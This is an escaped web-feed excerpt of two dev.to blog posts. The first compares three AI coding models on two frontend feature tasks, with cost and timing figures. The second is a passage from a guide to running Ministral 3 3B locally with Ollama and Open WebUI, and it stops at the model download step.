&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;The&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;implementation&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;should&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;follow&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;existing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;patterns,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;styling,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;state&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;management&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;used&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;codebase.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  GPT-5.2-Codex (high)
&lt;/h4&gt;

&lt;p&gt;GPT-5.2 handled this surprisingly well. The implementation was solid end to end, and it basically one-shotted the entire feature set, including i18n support, without needing multiple correction passes.&lt;/p&gt;

&lt;p&gt;That said, it did take a bit longer than some other models (~20 minutes), which is expected since reasoning was explicitly set to &lt;strong&gt;high&lt;/strong&gt;. You can clearly see the model spending more time thinking through architecture, naming, and edge cases rather than rushing to output code. The trade-off felt worth it here.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9r0rf1kkm4x2nlqpmnyg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9r0rf1kkm4x2nlqpmnyg.png" alt="gpt 5.2 high model timing to finish a task"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Token usage was noticeably higher with reasoning set to high, but the quality of the output code reflected it.&lt;/p&gt;

&lt;p&gt;Here's the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/QCXB5bv4-L4"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/6a8eea20c34d31429b254c82079a1972" rel="noopener noreferrer"&gt;GPT-5.2 High Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; ~$0.9-1.0&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~20 minutes (API time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +540 lines, minimal removals&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token Usage:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Total:&lt;/strong&gt; ~203k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Input:&lt;/strong&gt; ~140k (+ cached context)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output:&lt;/strong&gt; ~64k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reasoning tokens:&lt;/strong&gt; ~47k&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; I ran the exact same prompt with the same model using the default (medium) reasoning level. The difference was honestly massive. With reasoning set to high, the quality of the code, structure, and pretty much everything jumps by miles. It’s not even a fair comparison.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhg35u0w8yip2r8myxqlf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhg35u0w8yip2r8myxqlf.png" alt="gpt 5.2 model token usage to finish a task"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  Claude Opus 4.5
&lt;/h4&gt;

&lt;p&gt;Claude went all in and prepared a ton of different strategies. It did run into build issues at the start, but it kept re-running the build until every build and lint issue was fixed.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feib2ks93r37revcoqg3e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feib2ks93r37revcoqg3e.png" alt="claude opus 4.5 build error"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The entire run took about &lt;strong&gt;7 minutes 50 seconds&lt;/strong&gt;, the fastest of the three models on this test. All the features worked as asked, and the UI looked great, exactly how I expected.&lt;/p&gt;

&lt;p&gt;Here's the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/Gki_kO6o4Qw"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/5403f82ea5cf5991c14bc43ce3f47476" rel="noopener noreferrer"&gt;Claude Opus 4.5 Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To be honest, this exceeded my expectations; even the i18n texts are added and displayed in the UI just as expected. Absolute cinema!&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; $0.94&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; 7 min 50 sec (API Time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +540 lines, -9 lines&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7junvt7jb8wulyvnwnce.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7junvt7jb8wulyvnwnce.png" alt="claude opus 4.5 token usage to finish a task"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  Gemini 3 Pro
&lt;/h4&gt;

&lt;p&gt;Gemini 3 got it working, but it's clearly not on the same level as GPT-5.2 High or Claude Opus 4.5. The UI it built is fine and totally usable, but it feels a bit barebones, and you don't get many choices in the palette compared to the other two.&lt;/p&gt;

&lt;p&gt;One clear miss is that language switching does not show up inside the action palette at all, which makes the i18n support feel incomplete even though translations technically exist.&lt;/p&gt;

&lt;p&gt;Here's the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/2jxnkna5OmA"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/07d46534f0f3e2523ddc2f3e4c814795" rel="noopener noreferrer"&gt;Gemini 3 Pro Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; Low (helped significantly by cache reads)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~10 minutes 49 seconds (API Time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +428 lines, -65 lines&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token Usage:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Input:&lt;/strong&gt; ~79k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cache Reads:&lt;/strong&gt; ~536k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output:&lt;/strong&gt; ~10.7k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Savings:&lt;/strong&gt; ~87% of input tokens served from cache&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuzef5ujwyq1f5o19e7dg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuzef5ujwyq1f5o19e7dg.png" alt="gemini 3 pro token usage to finish a task"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Overall, Gemini 3 lands in a very clear third place here. It works, the UI looks fine, and nothing is completely broken, but compared to the depth, completeness, and polish of GPT-5.2 High and Claude Opus 4.5, it feels behind.&lt;/p&gt;
&lt;h3&gt;
  
  
  Test 2: Tool Usage Analytics + Insights Dashboard
&lt;/h3&gt;

&lt;p&gt;This test is a step up from the action palette.&lt;/p&gt;

&lt;p&gt;You can find the prompt I've used here: &lt;a href="https://gist.github.com/shricodev/637b453d206554b78eabd38fa159084d" rel="noopener noreferrer"&gt;Prompt&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  GPT-5.2-Codex (high)
&lt;/h4&gt;

&lt;p&gt;GPT-5.2 absolutely nailed this one.&lt;/p&gt;

&lt;p&gt;The final result turned out amazing. Tool usage tracking works exactly as expected, data persists correctly, and the dashboard feels like a real product feature. Most used tools, recent usage, filters, everything just works.&lt;/p&gt;

&lt;p&gt;One really nice touch is that it also wired analytics-related actions into the Action Palette from Test 1.&lt;/p&gt;

&lt;p&gt;It did take a bit longer than the first test, around 26 minutes, but again, that’s the trade-off with high reasoning. You can tell the model spent time thinking through data modeling, reuse, and avoiding duplicated logic. Totally worth it here.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/8RUeWl_09nY"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/b89de0278911b289d941b8129df69d66" rel="noopener noreferrer"&gt;GPT-5.2 High Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; ~$1.1–1.2&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~26 minutes (API time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; Large multi-file update, cleanly structured&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token Usage:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Total:&lt;/strong&gt; ~236k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Input:&lt;/strong&gt; ~162k (+ heavy cached context)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output:&lt;/strong&gt; ~75k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reasoning tokens:&lt;/strong&gt; ~57k&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;GPT-5.2 High continues to be slow but extremely powerful, and for a task like this, that’s a very good trade.&lt;/p&gt;
&lt;h4&gt;
  
  
  Claude Opus 4.5
&lt;/h4&gt;

&lt;p&gt;Claude Opus 4.5 did great here as well.&lt;/p&gt;

&lt;p&gt;The final implementation works end to end, and honestly, from a pure UI and feature standpoint, it’s hard to tell the difference between this and GPT-5.2 High. The dashboard looks clean, the data makes sense, and the filters work as expected.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/-npHfTxicF4"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/934c3841101c073b50a5dad18746d78d" rel="noopener noreferrer"&gt;Claude Opus 4.5 Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; $1.78&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~8 minutes (API Time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +1,279 lines, -17 lines&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;
  
  
  Gemini 3 Pro
&lt;/h4&gt;

&lt;p&gt;Gemini 3 Pro gets the job done, but it clearly takes a more minimal approach compared to GPT-5.2 High and Claude Opus 4.5.&lt;/p&gt;

&lt;p&gt;The overall experience feels bare-bones. The UI is functional but plain, and the dashboard lacks the polish and depth you get from the other two models.&lt;/p&gt;

&lt;p&gt;Also, unlike the other two models, it didn't add a button to open the analytics right from the action palette.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/JuQjYnY-XGE"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/cd2ceb9d4a6a1f53abd274cd1efc89ba" rel="noopener noreferrer"&gt;Gemini 3 Pro Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; Low, with heavy cache utilization&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~5 minutes (API Time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +351 lines, -3 lines&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token Usage:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Input:&lt;/strong&gt; ~67k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output:&lt;/strong&gt; ~7.1k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Savings:&lt;/strong&gt; ~85%+ input tokens served from cache&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Overall, Gemini 3 Pro remains efficient and reliable, but in a comparison like this, efficiency alone is not enough. 🤷‍♂️&lt;/p&gt;


&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;From this test, at least, I can conclude that these models are now pretty much able to one-shot decently complex work.&lt;/p&gt;

&lt;p&gt;Still, there have been times when the models messed up so badly that fixing the problems one by one would have taken me nearly as long as building the feature from scratch.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkxv5kpey20fduyyqrh3e.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkxv5kpey20fduyyqrh3e.gif" alt="dog sideeye gif"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If I compare the results across models, Opus 4.5 definitely takes the crown. But I still don’t think we’re anywhere close to relying on it for real, big production projects. The recent improvements are honestly insane, but the results still don’t fully back them up.&lt;/p&gt;

&lt;p&gt;For now, I think these models are great for refactoring, planning, and helping you move faster. But if you solely rely on their generated code, the codebase just won’t hold up long term.&lt;/p&gt;

&lt;p&gt;I don't see any of these recent models as “use it and ship it” for production in a project with millions of lines of code, at least not in the way people hype it up.&lt;/p&gt;

&lt;p&gt;Let me know your thoughts in the comments.&lt;/p&gt;

&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;





</description>
      <category>webdev</category>
      <category>programming</category>
      <category>javascript</category>
      <category>ai</category>
    </item>
    <item>
      <title>Ministral 3 3B Local Setup Guide with MCP Tool Calling 🔥</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Wed, 24 Dec 2025 16:26:00 +0000</pubDate>
      <link>https://forem.com/composiodev/ministral-3-3b-local-setup-guide-with-mcp-tool-calling-icm</link>
      <guid>https://forem.com/composiodev/ministral-3-3b-local-setup-guide-with-mcp-tool-calling-icm</guid>
      <description>&lt;p&gt;Everyone’s talking about Ministral 3 3B, so I wanted to see what the hype is about. 🤨&lt;/p&gt;

&lt;p&gt;Let's test it properly. We’ll start with the fun part and run it directly in the browser using WebGPU, fully local.&lt;/p&gt;

&lt;p&gt;Then we’ll switch to the practical setup and run a quantized version with Ollama, plug it into Open WebUI, and test real tool calling. First with small local Python tools, then with remote MCP tools via Composio.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fezz2omw7gxn6etpvh9fj.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fezz2omw7gxn6etpvh9fj.gif" alt="Shocked GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We will cover a few specs and then move on to practical tests, so let's jump in.&lt;/p&gt;




&lt;h2&gt;
  
  
  What’s Covered?
&lt;/h2&gt;

&lt;p&gt;In this hands-on guide, you’ll learn about the Ministral 3 3B model, how to run it locally, and how to get it to perform &lt;strong&gt;real tool calls&lt;/strong&gt; using Open WebUI, first with local tools and then with &lt;strong&gt;remote MCP tools via Composio&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What you will learn: ✨&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What makes Ministral 3 3B special&lt;/li&gt;
&lt;li&gt;How to run the model locally using Ollama (including pulling a quantized variant)&lt;/li&gt;
&lt;li&gt;How to launch Open WebUI using Docker and connect it to Ollama&lt;/li&gt;
&lt;li&gt;How to add and test local Python tools inside Open WebUI&lt;/li&gt;
&lt;li&gt;How to work with remotely hosted MCP tools in Open WebUI&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;NOTE:&lt;/strong&gt; This isn’t a benchmark post. The idea is to show a practical setup for running a small local model with real tools, then extending it with remote MCP servers.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  What's so Special?
&lt;/h2&gt;

&lt;p&gt;Ministral 3 3B is the smallest and most efficient model in the Ministral 3 family. The Mistral 3 release includes three state-of-the-art small dense models (14B, 8B, and 3B), along with Mistral Large 3, Mistral's most capable model to date. All models in the family are open source under the Apache 2.0 license, which means you can fine-tune them and use them commercially for free.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvb1w71afsm49cogmvamz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvb1w71afsm49cogmvamz.png" alt="Ministral 3 3B base benchmark"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But the topic of our talk is the &lt;strong&gt;Ministral 3 3B model&lt;/strong&gt;. At such a small size, it comes with function calling, structured output, vision capabilities, and most importantly, it is one of the first multimodal models capable of running &lt;strong&gt;completely locally&lt;/strong&gt; in the browser with WebGPU support.&lt;/p&gt;

&lt;p&gt;As Mistral puts it, this model is both compact and powerful. It is specially designed for edge deployment, offering insanely high speed and the ability to run completely locally even on fairly old or low-end hardware.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1b5y1mbj6yq1o1y2jgry.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1b5y1mbj6yq1o1y2jgry.png" alt="Ministral 3 3B claim"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here is the model’s token context window and pricing.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Token Context Window:&lt;/strong&gt; It comes with a 256K token context window, which is impressive for a model of this size. For reference, the recent Claude Opus 4.5 model, which is built specifically for agentic coding, comes with a 200K token context window.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Pricing:&lt;/strong&gt; Because it is open source, you can access it for free by running it locally. If you use it through the Mistral playground, pricing starts at $0.1 per million input tokens and $0.1 per million output tokens, which is almost negligible. It honestly feels like the pricing is there just for formality.&lt;/li&gt;
&lt;/ul&gt;
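&lt;p&gt;To put that pricing in perspective, here is a quick back-of-the-envelope sketch (the token counts are made up for illustration):&lt;/p&gt;

```python
# Ministral 3 3B playground pricing (from above): $0.1 per million tokens,
# for both input and output. The token counts below are hypothetical.
PRICE_PER_MILLION_TOKENS = 0.10

def call_cost(input_tokens: int, output_tokens: int) -> float:
    """Dollar cost of a single call at the flat per-million-token rate."""
    return (input_tokens + output_tokens) / 1_000_000 * PRICE_PER_MILLION_TOKENS

# A fairly large call: 10k tokens in, 2k tokens out.
print(f"${call_cost(10_000, 2_000):.4f}")  # → $0.0012
```

&lt;p&gt;A tenth of a cent for a 12k-token call. Pricing for formality, indeed.&lt;/p&gt;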

&lt;p&gt;Besides its decent context window and fully open-source nature, these are the major features of Ministral 3 3B.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Vision:&lt;/strong&gt; Enables the model to analyze images and provide insights based on visual content, in addition to text.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Multilingual:&lt;/strong&gt; Supports dozens of languages, including English, French, Spanish, German, and more.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Agentic:&lt;/strong&gt; Offers strong agentic capabilities with native function calling and JSON output, which we will cover shortly.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Local:&lt;/strong&gt; Runs completely locally in your browser with WebGPU support.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here is a small demo of the model running directly in the browser:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/p8i06eO5rOs"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;To actually get a feel for running a model locally in the browser, head over to this Hugging Face Space: &lt;a href="https://huggingface.co/spaces/mistralai/Ministral_3B_WebGPU" rel="noopener noreferrer"&gt;mistralai/Ministral_3B_WebGPU&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; For most users, this will work out of the box, but some may encounter an error if WebGPU is not enabled or supported in their browser. Make sure WebGPU is enabled based on the browser you are using.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;When you load it, the model files, roughly 3GB, are downloaded into your browser cache, and the model runs 100 percent locally with WebGPU acceleration. It is powered by &lt;a href="https://huggingface.co/docs/transformers.js/en/index" rel="noopener noreferrer"&gt;Transformers.js&lt;/a&gt;, and all prompts are handled directly in the browser. No remote requests are made. Everything happens locally.&lt;/p&gt;

&lt;p&gt;How cool is that? You can run a capable multimodal model entirely inside your browser, with no server involved.&lt;/p&gt;




&lt;h2&gt;
  
  
  Running Ministral 3 3B Locally
&lt;/h2&gt;

&lt;p&gt;In the above example, you see how the model does such an amazing job with vision capabilities (live video classification). Now let's see how good this model is at making tool calls. We will test it by running the model locally on our system.&lt;/p&gt;

&lt;p&gt;For this, there are generally two recommended approaches:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;vLLM&lt;/strong&gt;: Easy, fast, and cheap LLM serving for everyone.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Good old Ollama&lt;/strong&gt;: Chat &amp;amp; build with open models.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You can go with either option. Generally speaking, vLLM is the easier one to get started with, and that's what I'd suggest, but...&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6szsqilyrylxfqp4fqby.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6szsqilyrylxfqp4fqby.png" alt="CUDA out of memory"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I kept hitting a CUDA out-of-memory error, so I went with Ollama and a quantized model instead. I have had a great experience with Ollama so far, and the quantized model is good enough for our demo.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Install Ollama and Docker
&lt;/h3&gt;

&lt;p&gt;If you don't have Ollama installed already, install it on your system by following the documentation here: &lt;a href="https://ollama.com/download" rel="noopener noreferrer"&gt;Ollama Installation Guide&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;It's not compulsory, but we will run Open WebUI in a Docker container, so if you plan to follow along, make sure you have Docker installed.&lt;/p&gt;

&lt;p&gt;You can find the Docker installation guide here: &lt;a href="https://docs.docker.com/engine/install/" rel="noopener noreferrer"&gt;Docker Installation&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Download Ministral 3 3B Model and Start Ollama
&lt;/h3&gt;

&lt;p&gt;Now that you have Ollama installed and Docker running, let's download the &lt;a href="https://ollama.com/library/ministral-3:3b" rel="noopener noreferrer"&gt;Ministral 3 3B model&lt;/a&gt; and start Ollama.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ollama pull ministral-3:3b
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
